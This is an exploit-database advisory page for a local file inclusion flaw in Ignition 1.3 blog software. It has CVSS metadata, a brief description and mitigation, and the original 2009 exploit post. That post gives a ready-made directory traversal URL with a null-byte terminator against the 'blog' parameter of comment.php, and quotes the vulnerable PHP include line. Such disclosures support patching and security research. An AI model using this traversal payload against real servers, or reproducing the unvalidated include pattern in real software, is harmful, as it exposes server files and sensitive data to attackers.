Ignition 1.3 Local File Include

vendor:

Ignition

by:

n0n0x

7.5

CVSS

HIGH

Local File Include

CWE

Product Name: Ignition

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: ignition

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ignition 1.3 Local File Include

An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious input in the 'blog' parameter. This can allow the attacker to include a file from the web server's file system, such as the web server's log files, which may contain sensitive information.

Mitigation:

Input validation should be used to prevent the inclusion of maliciously supplied data in the 'blog' parameter.

Source

Exploit-DB raw data:

#######################################################
#Ignition 1.3 <=== Local File Include
#######################################################
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Download script :http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
#######################################################
=========================================
xpl : 
http://site.com/comment.php?blog=../../../../../../../../../../LFI%00

<?php 
session_start();
require ('data/settings.php');
include ('data/posts/'.$_GET['blog'].'.txt'); <== LFI vuln
?>
=========================================
#######################################################
#Greetz: all member | manadocoding.org - sekuritiOnline.net
#
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3,  0pa, x0r0n, team_elite, thama,
#            devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet
######################################################